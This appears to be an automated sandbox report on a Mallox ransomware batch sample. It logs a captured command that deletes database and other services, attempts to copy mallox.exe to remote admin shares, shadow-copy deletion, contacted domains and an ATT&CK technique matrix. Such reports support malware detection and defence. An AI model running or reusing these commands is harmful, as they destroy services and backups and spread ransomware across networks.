        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"Jump to behavior

        Stealing of Sensitive Information

        barindex
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: \\224.0.0.22\admin$\mallox.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: \\224.0.0.22\admin$\mallox.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: \\224.0.0.22\admin$\mallox.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: \\224.0.0.22\c$\mallox.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: \\224.0.0.22\c$\mallox.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: \\224.0.0.22\c$\mallox.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: \\192.168.2.1\admin$\mallox.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: \\192.168.2.1\admin$\mallox.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: \\192.168.2.1\admin$\mallox.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: \\192.168.2.1\c$\mallox.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: \\192.168.2.1\c$\mallox.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: \\192.168.2.1\c$\mallox.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Documents and SettingsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Documents and SettingsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: number of queries: 1001
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting
        1
        Replication Through Removable Media
        1
        Windows Management Instrumentation
        1
        Scripting
        1
        DLL Side-Loading
        211
        Disable or Modify Tools
        OS Credential Dumping1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        3
        Ingress Tool Transfer
        Exfiltration Over Other Network Medium1
        Data Encrypted for Impact
        CredentialsDomainsDefault Accounts1
        Native API
        1
        DLL Side-Loading
        1
        Access Token Manipulation
        11
        Deobfuscate/Decode Files or Information
        LSASS Memory11
        Peripheral Device Discovery
        Remote Desktop Protocol1
        Data from Local System
        21
        Encrypted Channel
        Exfiltration Over Bluetooth1
        Inhibit System Recovery
        Email AddressesDNS ServerDomain Accounts12
        Command and Scripting Interpreter
        13
        Windows Service
        13
        Windows Service
        2
        Obfuscated Files or Information
        Security Account Manager23
        File and Directory Discovery
        SMB/Windows Admin SharesData from Network Shared Drive3
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts13
        Service Execution
        1
        Registry Run Keys / Startup Folder
        11
        Process Injection
        1
        Software Packing
        NTDS37
        System Information Discovery
        Distributed Component Object ModelInput Capture4
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud Accounts1
        PowerShell
        Network Logon Script1
        Registry Run Keys / Startup Folder
        1
        DLL Side-Loading
        LSA Secrets1
        Network Share Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        File Deletion
        Cached Domain Credentials1
        Query Registry
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Masquerading
        DCSync141
        Security Software Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
        Virtualization/Sandbox Evasion
        Proc Filesystem31
        Virtualization/Sandbox Evasion
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Access Token Manipulation
        /etc/passwd and /etc/shadow2
        Process Discovery
        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
        Process Injection
        Network Sniffing1
        Application Window Discovery
        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
        Hidden Files and Directories
        Input Capture1
        System Network Configuration Discovery
        Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1611767 Sample: R1TftmQpuQ.bat Startdate: 11/02/2025 Architecture: WINDOWS Score: 100 104 whyers.io 2->104 106 api.ipify.org 2->106 126 Suricata IDS alerts for network traffic 2->126 128 Malicious sample detected (through community Yara rule) 2->128 130 Multi AV Scanner detection for submitted file 2->130 132 15 other signatures 2->132 12 cmd.exe 2 2->12         started        signatures3 process4 file5 102 C:\Users\user\Desktop\R1TftmQpuQ.bat.exe, PE32 12->102 dropped 148 Uses attrib.exe to hide files 12->148 16 R1TftmQpuQ.bat.exe 19 12->16         started        20 conhost.exe 12->20         started        22 attrib.exe 1 12->22         started        signatures6 process7 file8 90 C:\Users\user\AppData\...\Bwmeldokiller.bat, ASCII 16->90 dropped 92 C:\Users\user\...\R1TftmQpuQ.bat.exe.log, CSV 16->92 dropped 114 Encrypted powershell cmdline option found 16->114 116 Deletes shadow drive data (may be related to ransomware) 16->116 118 Powershell is started from unusual location (likely to bypass HIPS) 16->118 120 2 other signatures 16->120 24 MSBuild.exe 3 1028 16->24         started        29 cmd.exe 1 16->29         started        31 powershell.exe 15 16->31         started        signatures9 process10 dnsIp11 108 whyers.io 13.248.169.48, 443, 49844, 49850 AMAZON-02US United States 24->108 110 192.168.2.1, 135, 274 unknown unknown 24->110 112 2 other IPs or domains 24->112 94 C:\Users\user\AppData\Local\...\toptraffic[1], DOS 24->94 dropped 96 C:\Users\user\...\user-PC-20231005-0824.log, data 24->96 dropped 98 C:\...\prep_ui_win32_bundle_V8_perf.cache, data 24->98 dropped 100 183 other files (180 malicious) 24->100 dropped 134 May disable shadow drive data (uses vssadmin) 24->134 136 Creates files in the recycle bin to hide itself 24->136 138 Deletes shadow drive data (may be related to ransomware) 24->138 146 4 other signatures 24->146 33 vssadmin.exe 24->33         started        36 cmd.exe 24->36         started        38 cmd.exe 24->38         started        40 cmd.exe 24->40         started        140 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 29->140 142 Excessive usage of taskkill to terminate processes 29->142 144 Disables security and backup related services 29->144 42 cmd.exe 29->42         started        44 cmd.exe 29->44         started        46 cmd.exe 29->46         started        50 7 other processes 29->50 48 conhost.exe 31->48         started        file12 signatures13 process14 signatures15 122 Deletes shadow drive data (may be related to ransomware) 33->122 52 conhost.exe 33->52         started        60 2 other processes 36->60 54 conhost.exe 38->54         started        56 conhost.exe 40->56         started        124 Excessive usage of taskkill to terminate processes 42->124 58 net.exe 42->58         started        62 5 other processes 42->62 64 4 other processes 44->64 66 5 other processes 46->66 68 13 other processes 50->68 process16 process17 70 net1.exe 58->70         started        72 net1.exe 62->72         started        74 net1.exe 64->74         started        76 net1.exe 64->76         started        78 net1.exe 64->78         started        80 Conhost.exe 66->80         started        82 net1.exe 68->82         started        84 net1.exe 68->84         started        86 net1.exe 68->86         started        process18 88 Conhost.exe 70->88         started       

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.